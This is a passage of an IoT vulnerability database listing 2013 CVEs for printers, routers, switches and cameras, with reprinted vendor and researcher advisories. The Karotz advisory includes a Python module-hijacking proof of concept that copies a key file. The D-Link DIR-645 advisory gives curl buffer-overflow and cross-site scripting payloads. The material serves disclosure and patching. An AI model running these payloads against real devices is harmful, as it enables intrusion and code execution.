VARIoT IoT vulnerabilities database


VAR-201308-0275 CVE-2013-4807 Multiple HP LaserJet Pro firmware vulnerabilities that allow data modification CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Unspecified vulnerability on the HP LaserJet Pro P1102w, P1606dn, M1212nf MFP, M1213nf MFP, M1214nfh MFP, M1216nfh MFP, M1217nfw MFP, M1218nfs MFP, and CP1025nw with firmware before 2013-07-26 20130703 allows remote attackers to modify data via unknown vectors. Multiple HP LaserJet Pro devices contain a vulnerability that allows data to be altered; data may be changed by a third party. The HP LaserJet Pro is a laser printer device developed by Hewlett Packard. Multiple HP LaserJet Pro products have security vulnerabilities that allow malicious users to bypass some security restrictions and gain unauthorized access to restricted data. Technical details are currently unavailable. We will update this BID as soon as more information becomes available. Remote attackers can exploit this issue to gain access to sensitive information that may aid in further attacks. The vulnerability exists in the following products and versions: P1102w, P1606dn, M1212nf MFP, M1213nf MFP, M1214nfh MFP, M1216nfh MFP, M1217nfw MFP, M1218nfs MFP and CP1025nw using firmware earlier than 2013-07-26 20130703
VAR-201705-0955 CVE-2013-3913 Cisco VC220/240 Network Cameras Denial of Service Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2013. Notes: none. The Cisco VC220 and VC240 cameras are network camera devices distributed by Cisco. The Cisco Video Surveillance VC220 Network Dome Camera and the Cisco VC240 Network Bullet Camera have security vulnerabilities that allow remote unauthenticated attackers to send specially crafted messages that prevent the device's WEBUI from being accessed, resulting in a denial of service attack
VAR-201308-0470 No CVE Huawei B153 3G/UMTS Router Password Disclosure Access Bypass Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Huawei B153 is a mobile access device. The Huawei B153 3G/UMTS router firmware version 1096.11.405.03.111sp02 supports the WPS protocol for user convenience. Huawei B153 3G/UMTS is a wireless router product from China's Huawei. An access bypass vulnerability exists in the Huawei B153 3G/UMTS router. An attacker could use this vulnerability to bypass specific security restrictions and perform unauthorized operations. The vulnerability exists in the Huawei B153 3G/UMTS running firmware version 1096.11.405.03.111sp02; other versions may also be affected
VAR-201311-0107 CVE-2013-4204 Google Web Toolkit GWTTestCase JUnit file cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities in the JUnit files in the GWTTestCase in Google Web Toolkit (GWT) before 2.5.1 RC1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Google Web Toolkit 2.5.0 is vulnerable; other versions may also be affected
VAR-201912-1593 CVE-2013-4867 Electronic Arts Karotz Smart Rabbit privilege management vulnerability CVSS V2: 6.2
CVSS V3: 6.3
Severity: MEDIUM
Electronic Arts Karotz Smart Rabbit contains a privilege management vulnerability. Information may be acquired or falsified, or the device may be placed in a denial of service (DoS) state. Violet Karotz is a device called Wireless Smart Rabbit. Violet Karotz does not properly load Python modules, allowing attackers to build malicious .py files, hijack Python modules and execute malicious code. This attack requires a USB flash drive to be inserted into the Karotz unit without the need to switch the Karotz.

Trustwave SpiderLabs Security Advisory TWSL2013-021: Multiple Vulnerabilities in Karotz Smart Rabbit
Published: 08/01/13
Version: 1.0
Vendor: Electronic Arts (http://www.ea.com/), formerly Mindscape, formerly Violet
Product: Karotz
Version affected: 12.07.19.00

Product description: Karotz is the successor to the "Nabaztag". Nabaztag is a Wi-Fi enabled ambient electronic device in the shape of a rabbit, invented by Rafi Haladjian and Olivier Mével, and manufactured by the company Violet.[1] Nabaztag was designed to be a "smart object" comparable to those manufactured by Ambient Devices; it can connect to the Internet (to download weather forecasts, read its owner's email, etc.). It is also customizable and programmable to an extent.

Finding 1: Python Module Hijacking
Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4867
CWE: CWE-427

During the setup process for a Karotz unit, if wifi is selected as the method used to connect to the Internet, a python script named "autorunwifi" is run as root to set up the wifi connectivity. Another file, named "autorunwifi.sig", contains a signature of autorunwifi signed with the private key for Violet, to prevent modifications to the "autorunwifi" script. In this case, it is possible to write a Python script named "simplejson.py" and place it in the same directory as the other setup files, which will cause the contents of simplejson.py to be executed at the beginning of the "autorunwifi" script execution.

The following is a proof of concept "simplejson.py" file that will copy the pubring.gpg file from the Karotz onto the inserted USB key, which is processed with MD5 to produce the key used to decrypt the root filesystem for the Karotz:

    ## simplejson.py
    import os
    os.system("cp /karotz/etc/gpg/pubring.gpg /mnt/usbkey")
    ## end simplejson.py

Finding 2: API Session Token Passed in Cleartext
Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4868

There are two kinds of applications for the Karotz: hosted and external. Hosted applications are stored and run on the Karotz itself. External applications run outside the Karotz unit and control the Karotz through an API at api.karotz.com. Both types of applications must specifically request to use parts of the Karotz in the manifest file of their application package. For instance, if your application uses the webcam and ears, you must specify in your application manifest that these will be used by your application before they will be available to your application. The control is performed over plaintext HTTP. As such, the session token authenticating API calls used to control the Karotz is available to an eavesdropping attacker. The session token can be used to perform any remote API call available to the application. For instance, if the application uses the webcam, a video could be captured using the webcam and sent to an arbitrary server.

Vendor Response: No response received.

Remediation Steps: No official patch is available. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.

Revision History:
06/19/13 - Attempt to contact vendor
07/10/13 - Attempt to contact vendor
07/12/13 - Attempt to contact vendor
08/01/13 - Advisory published

Additional Credits: Discussion of Python module loading behavior and initial suggestion of application to Karotz by Jennifer Savage

References
1. http://www.karotz.com
2. http://savagejen.github.io/blog/2013/04/28/python-module-hijacking/

About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations, ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers, manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply
VAR-201401-0484 CVE-2013-7306 Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers CVSS V2: 5.4
CVSS V3: -
Severity: MEDIUM
The OSPF implementation on Brocade routers does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. Multiple Brocade routers are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions, take full control of the OSPF AS domain routing table, blackhole traffic and intercept traffic. This may aid in further attacks
VAR-201401-0489 CVE-2013-7311 Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers CVSS V2: 5.4
CVSS V3: -
Severity: MEDIUM
The OSPF implementation in Check Point Gaia OS R75.X and R76 and IPSO OS 6.2 R75.X and R76 does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability is related to CVE-2013-0149. Supplementary information: the CWE vulnerability type has been identified as CWE-694: Use of Multiple Resources with Duplicate Identifier. Check Point Gaia is a unified security operating system. Check Point IPSO is a firewall operating system. Exploitation can disrupt routing or disclose sensitive packet information. Multiple Check Point appliances are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions, take full control of the OSPF AS domain routing table, blackhole traffic and intercept traffic. This may aid in further attacks. Check Point Gaia OS R75.X and R76 and IPSO OS 6.2 R75.X and R76 have a vulnerability in their OSPF implementation: they do not consider the possibility of duplicate Link State ID values
VAR-201401-0490 CVE-2013-7312 Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers CVSS V2: 5.4
CVSS V3: -
Severity: MEDIUM
The OSPF implementation on Enterasys switches and routers does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability is related to CVE-2013-0149. Supplementary information: the CWE vulnerability type has been identified as CWE-694: Use of Multiple Resources with Duplicate Identifier. Enterasys is a well-known network vendor. Exploitation can disrupt routing or disclose sensitive packet information. Multiple Enterasys products are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions, take full control of the OSPF AS domain routing table, blackhole traffic and intercept traffic. This may aid in further attacks
VAR-201308-0274 CVE-2013-4806 Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers CVSS V2: 7.0
CVSS V3: -
Severity: HIGH
The OSPF implementation on HP JD9##A routers; HP J4###A, J484#B, J8###A, JD3##A, JE###A, and JF55#A switches; HP 3COM routers and switches; and HP H3C routers and switches does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote authenticated users to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. Information disclosure and denial of service vulnerabilities exist in multiple HP products. HP JD9##A, 3COM, H3C, etc. are all routers and switches of Hewlett-Packard (HP).

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03880910

SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03880910
Version: 1
HPSBHF02912 rev.1 - HP Networking Products including H3C and 3COM Routers and Switches, OSPF Remote Information Disclosure and Denial of Service
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
References: CVE-2013-4806 (CERT VU#229804 SSRT101224)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION section below for a list of impacted products.
BACKGROUND

CVSS 2.0 Base Metrics
Reference: CVE-2013-4806
Base Vector: (AV:N/AC:M/Au:S/C:P/I:N/A:C)
Base Score: 7
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has made the following software updates available to resolve the vulnerabilities in the following products (each fixed version is followed by the impacted HP, H3C and 3Com branded products):

Fixed Version R5000_3.14p14
  HP Branded Products Impacted: JD935A HP 5012 Router; JD943A HP 5232 Router; JD944A HP 5642 Router; JD945A HP Router 5642 TAA; JD946A HP 5682 Router
  H3C Branded Products Impacted: N/A
  3Com Branded Products Impacted: 3Com Router 5642 TAA (3C13755TAA); 3Com Router 5012 (3C13701); 3Com Router 5232 (3C13751); 3Com Router 5642 (3C13755); 3Com Router 5682 (3C13759)

Fixed Version R301X_1.40.23
  HP Branded Products Impacted: JD916A HP 3012 Router; JD919A HP 3018 Router
  H3C Branded Products Impacted: N/A
  3Com Branded Products Impacted: 3Com Router 3012 (3C13612); 3Com Router 3018 (3C13618)

Fixed Version S5600_3.10.R1702P39
  HP Branded Products Impacted: JD391A HP S5600-50C Ethernet Switch; JD392A HP S5600-50C-PWR Ethernet Switch; JD393A HP S5600-26C Ethernet Switch; JD394A HP S5600-26C-PWR Ethernet Switch; JD395A HP S5600-26F Ethernet Switch
  H3C Branded Products Impacted: H3C S5600-26C Ethernet Switch (0235A11F); H3C S5600-26C-PWR Ethernet Switch (0235A11G); H3C S5600-26F Ethernet Switch (0235A11H); H3C S5600-50C Ethernet Switch (0235A11D); H3C S5600-50C-PWR Ethernet Switch (0235A11E)
  3Com Branded Products Impacted: N/A

Fixed Version E5500G_03.03.02p19
  HP Branded Products Impacted: JE088A HP E5500-24G Switch; JE089A HP E5500-24G Switch (TAA); JE090A HP E5500-48G Switch; JE091A HP E5500-48G Switch (TAA); JE092A HP E5500-24G-PoE Switch; JE093A HP E5500-24G-PoE Switch (TAA); JE094A HP E5500-48G-PoE Switch; JE095A HP E5500-48G-PoE Switch (TAA); JE096A HP E5500-24G-SFP Switch; JE097A HP E5500-24G-SPF Switch (TAA); JF551A HP SS4 SWITCH 5500G-EI 24PT (no psu); JF552A HP SS4 SWITCH 5500G-EI 48PT (no psu); JF553A HP SS4 5500G-EI 24 PORT SFP (no psu)
  H3C Branded Products Impacted: N/A
  3Com Branded Products Impacted: 3Com SS4 5500G-EI 24 Port SFP (NO PSU) (3CR17259-91); 3Com SS4 Switch 5500G-EI 24PT (NO PSU) (3CR17254-91); 3Com SS4 Switch 5500G-EI 48PT (NO PSU) (3CR17255-91); 3Com Switch 5500G-EI 24 Port (3CR17250-91); 3Com Switch 5500G-EI 48-Port (3CR17251-91); 3Com Switch 5500G-EI PWR 24-Port (3CR17252-91); 3Com Switch 5500G-EI PWR 48-Port (3CR17253-91); 3Com Switch 5500G-EI SFP 24-Port (3CR17258-91); 3Com TAA Compliant 5500G-EI 24-Port (3CR17250TAA-91); 3Com TAA Compliant 5500G-EI 48-Port (3CR17251TAA-91); 3Com TAA Compliant 5500G-EI PWR 24P (3CR17252TAA-91); 3Com TAA Compliant 5500G-EI PWR 48P (3CR17253TAA-91); 3Com TAA Compliant 5500G-EI SFP 24P (3CR17258TAA-91)

Fixed Version E5500_03.03.02p19
  HP Branded Products Impacted: JE099A HP E5500-24 SI Switch; JE100A HP E5500-48 SI Switch; JE101A HP E5500-24 Switch; JE102A HP E5500-24 Switch (TAA); JE103A HP E5500-48 Switch; JE104A HP E5500-48 Switch (TAA); JE105A HP E5500-24-PoE Switch; JE106A HP E5500-24-PoE Switch (TAA); JE107A HP E5500-48-PoE Switch; JE108A HP E5500-48-PoE Switch (TAA); JE109A HP E5500-24-SFP Switch; JE110A HP E5500-24-SPF Switch (TAA)
  H3C Branded Products Impacted: N/A
  3Com Branded Products Impacted: 3Com SS4 Switch 5500-SI 28 Port (3CR17151-91); 3Com SS4 Switch 5500-SI 52 Port (3CR17152-91); 3Com Switch 5500-EI 28-Port (3CR17161-91); 3Com Switch 5500-EI 28-Port FX (3CR17181-91); 3Com Switch 5500-EI 52-Port (3CR17162-91); 3Com Switch 5500-EI PWR 28-Port (3CR17171-91); 3Com Switch 5500-EI PWR 52-Port (3CR17172-91); 3Com TAA Switch 5500-EI 28-Port (3CR17161TAA-91); 3Com TAA Switch 5500-EI 28-Port FX (3CR17181TAA-91); 3Com TAA Switch 5500-EI 52-Port (3CR17162TAA-91); 3Com TAA Switch 5500-EI PWR 28-Port (3CR17171TAA-91); 3Com TAA Switch 5500-EI PWR 52-Port (3CR17172TAA-91)

Fixed Version S3600.EI_3.10.R1702P34
  HP Branded Products Impacted: JD326A HP 3600-24-PoE EI Switch; JD328A HP 3600-48-PoE EI Switch; JD331A HP 3600-24 EI Switch; JD333A HP 3600-48 EI Switch; JD334A HP 3600-24-SFP EI Switch
  H3C Branded Products Impacted: H3C S3600-28F-EI - model LS-3600-28F-EI-OVS (0235A10L); H3C S3600-28P-EI - model LS-3600-28P-EI-OVS (0235A10H); H3C S3600-28P-PWR-EI - model LS-3600-28P-PWR-EI-OVS (0235A10C); H3C S3600-52P-EI - model LS-3600-52P-EI-OVS (0235A10K); H3C S3600-52P-PWR-EI - model LS-3600-52P-PWR-EI-OVS (0235A10E)
  3Com Branded Products Impacted: N/A

Fixed Version E.11.38
  HP Branded Products Impacted: J4850A HP ProCurve Switch 5304xl; J8166A HP ProCurve Switch 5304xl-32G; J4819A HP ProCurve Switch 5308xl; J8167A HP ProCurve Switch 5308xl-48G; J4849A HP ProCurve Switch 5348xl; J4849B HP ProCurve Switch 5348xl; J4848A HP ProCurve Switch 5372xl; J4848B HP ProCurve Switch 5372xl
  H3C Branded Products Impacted: N/A
  3Com Branded Products Impacted: N/A

Fixed Version M.10.99
  HP Branded Products Impacted: J4906A HP E3400-48G cl Switch; J4905A HP ProCurve Switch 3400cl-24G
  H3C Branded Products Impacted: N/A
  3Com Branded Products Impacted: N/A

Fixed Version M.08.140
  HP Branded Products Impacted: J8433A HP 6400-6XG CL Switch; J8474A HP 6410-6XG CL Switch
  H3C Branded Products Impacted: N/A
  3Com Branded Products Impacted: N/A

HISTORY
Version:1 (rev.1) - 8 August 2013 Initial Release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind.
To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
VAR-201308-0089 CVE-2013-3442 Cisco Unified Communications Manager web portal sensitive stack trace information disclosure vulnerability CVSS V2: 4.0
CVSS V3: -
Severity: MEDIUM
The web portal in Cisco Unified Communications Manager (Unified CM) allows remote authenticated users to obtain sensitive stack-trace information via unspecified vectors that trigger a stack exception, aka Bug ID CSCug34854. The vendor has confirmed this vulnerability and released it as Bug ID CSCug34854. Remotely authenticated users can obtain sensitive stack trace information. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCug34854. Cisco Unified Communications Manager provides a scalable, distributed and highly available enterprise IP telephony call processing solution
VAR-201308-0093 CVE-2013-3450 Cisco Unified Communications Manager User WebDialer page cross-site request forgery vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Cross-site request forgery (CSRF) vulnerability in the User WebDialer page in Cisco Unified Communications Manager (Unified CM) allows remote attackers to hijack the authentication of arbitrary users for requests that dial calls, aka Bug ID CSCui13028. The vendor has confirmed this vulnerability and released it as Bug ID CSCui13028. A third party could hijack the authentication of any user and dial calls. Attackers can exploit this issue to perform certain administrative actions and to gain unauthorized access to the affected application. This issue is being tracked by Cisco bug ID CSCui13028. Cisco Unified Communications Manager provides a scalable, distributed and highly available enterprise IP telephony call processing solution. A remote attacker can exploit this vulnerability to hijack the authentication of any user's call request
VAR-201308-0094 CVE-2013-3451 Cisco Unified Communications Manager cross-site request forgery vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Multiple cross-site request forgery (CSRF) vulnerabilities in Cisco Unified Communications Manager (Unified CM) allow remote attackers to hijack the authentication of arbitrary users for requests that perform arbitrary Unified CM operations, aka Bug ID CSCui13033. Attackers can exploit this issue to perform certain administrative actions and to gain unauthorized access to the affected application. This issue is being tracked by Cisco bug ID CSCui13033. Cisco Unified Communications Manager provides a scalable, distributed and highly available enterprise IP telephony call processing solution. Multiple cross-site request forgery vulnerabilities exist in CUCM
VAR-201401-0486 CVE-2013-7308 Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers CVSS V2: 5.4
CVSS V3: -
Severity: MEDIUM
The OSPF implementation on the D-Link DES-3810-28 switch with firmware R2.20.B017 does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability is related to CVE-2013-0149. Supplementary information: the CWE vulnerability type has been identified as CWE-694: Use of Multiple Resources with Duplicate Identifier. The D-Link DES-3810-28 is a switch device. Exploitation can disrupt routing or disclose sensitive packet information. Multiple D-Link routers are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions, take full control of the OSPF AS domain routing table, blackhole traffic and intercept traffic. This may aid in further attacks. There is a security vulnerability in the OSPF implementation of the D-Link DES-3810-28 switch using firmware R2.20.B017: it does not consider the possibility of duplicate Link State ID values
VAR-201407-0318 CVE-2013-7389 D-Link DIR-645 Router firmware cross-site scripting vulnerability

Related entries in the VARIoT exploits database: VAR-E-201308-0274
CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php. D-Link DIR-645 Router (Rev. A1) contains a cross-site scripting vulnerability. A third party may insert web script or HTML via the following parameters: (1) the deviceid parameter of parentalcontrols/bind.php, (2) the RESULT parameter of info.php, (3) the receiver parameter of bsc_sms_send.php. The D-Link DIR-645 Widget function has an unexplained security vulnerability that allows a remote attacker to gain unauthorized access to the device. The D-Link DIR-645 is a wireless router device. D-Link DIR-645 "post_login.xml", "hedwig.cgi" and "authentication.cgi" incorrectly filter user-submitted parameter data, allowing remote attackers to submit specially crafted requests that trigger buffer overflows, causing the application to stop responding and resulting in a denial of service. Remote attackers can exploit these issues to execute arbitrary code in the context of the affected device or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and perform unauthorized actions. Other attacks may also be possible. D-Link DIR-645 running firmware 1.03B08 is vulnerable; other versions may also be affected.

Multiple vulnerabilities on D-Link DIR-645 devices
==================================================

[ADVISORY INFORMATION]
Title: Multiple vulnerabilities on D-Link DIR-645 devices
Discovery date: 06/03/2013
Release date: 02/08/2013
Advisory URL: http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt
Credits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari)

[AFFECTED PRODUCTS]
This security vulnerability affects the following products and firmware versions:
* D-Link DIR-645, 1.03B08
Other products and firmware versions could also be vulnerable, but they were not checked.

All of them are exploitable by remote, unauthenticated attackers. Details are outlined in the following, including some proof-of-concepts.

1. Buffer overflow on "post_login.xml"
Invoking the "post_login.xml" server-side script, attackers can specify a "hash" password value that is used to authenticate the user. This hash value is eventually processed by the "/usr/sbin/widget" local binary. However, the latter copies the user-controlled hash into a statically-allocated buffer, allowing attackers to overwrite adjacent memory locations. As a proof-of-concept, the following URL allows attackers to control the return value saved on the stack (the vulnerability is triggered when executing "/usr/sbin/widget"):
curl http://<target ip>/post_login.xml?hash=AAA...AAABBBB
The value of the "hash" HTTP GET parameter consists of 292 occurrences of the 'A' character, followed by four occurrences of character 'B'. In our lab setup, characters 'B' overwrite the saved program counter (%ra).

2. Buffer overflow on "hedwig.cgi"
Another buffer overflow affects the "hedwig.cgi" CGI script. Unauthenticated remote attackers can invoke this CGI with an overly-long cookie value that can overflow a program buffer and overwrite the saved program address. Proof-of-concept:
curl -b uid=$(perl -e 'print "A"x1400;') -d 'test' http://<target ip>/hedwig.cgi

3. Buffer overflow on "authentication.cgi"
The third buffer overflow vulnerability affects the "authentication.cgi" CGI script. This time the issue affects the HTTP POST parameter named "password". Again, this vulnerability can be abused to achieve remote code execution. As for all the previous issues, no authentication is required. Proof-of-concept:
curl -b uid=test -d $(perl -e 'print "uid=test&password=asd" . "A"x2024;') http://<target ip>/authentication.cgi

4. Cross-site scripting on "bind.php"
Proof-of-concept:
curl "http://<target ip>/parentalcontrols/bind.php?deviceid=test'\"/><script>alert(1)</script><"

5. Cross-site scripting on "info.php"
Proof-of-concept:
curl "http://<target ip>/info.php?RESULT=testme\", msgArray); alert(1); //"

6. Cross-site scripting on "bsc_sms_send.php"
Proof-of-concept:
curl "http://<target ip>/bsc_sms_send.php?receiver=testme\"/><script>alert(1);</script><div"

[REMEDIATION]
D-Link has released an updated firmware version (1.04) that addresses this issue. The firmware is already available on the D-Link web site, at the following URL:
http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000

[DISCLAIMER]
The author is not responsible for the misuse of the information provided in this security advisory. The advisory is a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice
VAR-201401-0487 CVE-2013-7309 Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers CVSS V2: 5.4
CVSS V3: -
Severity: MEDIUM
The OSPF implementation in Extreme Networks EXOS does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability is related to CVE-2013-0149. Supplementary information: the CWE vulnerability type has been identified as CWE-694 (Use of Multiple Resources with Duplicate Identifier). Extreme Networks EXOS is a network equipment product. ExtremeXOS is prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackhole traffic, and intercept traffic. This may aid in further attacks
VAR-201401-0492 CVE-2013-7314 Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
The OSPF implementation on NEC IP38X, IX1000, IX2000, and IX3000 routers does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability is related to CVE-2013-0149. Supplementary information: the CWE vulnerability type has been identified as CWE-694 (Use of Multiple Resources with Duplicate Identifier). NEC IP38X, IX1000, IX2000 and IX3000 routers are router devices. Routing may be disrupted or sensitive packet information obtained. Multiple NEC Products are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackhole traffic, and intercept traffic. This may aid in further attacks
VAR-201401-0488 CVE-2013-7310 Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers CVSS V2: 5.4
CVSS V3: -
Severity: MEDIUM
The OSPF implementation on Yamaha routers does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. Yamaha routers are router devices. Multiple Yamaha products are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackhole traffic, and intercept traffic. This may aid in further attacks
VAR-201401-0485 CVE-2013-7307 Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers CVSS V2: 5.4
CVSS V3: -
Severity: MEDIUM
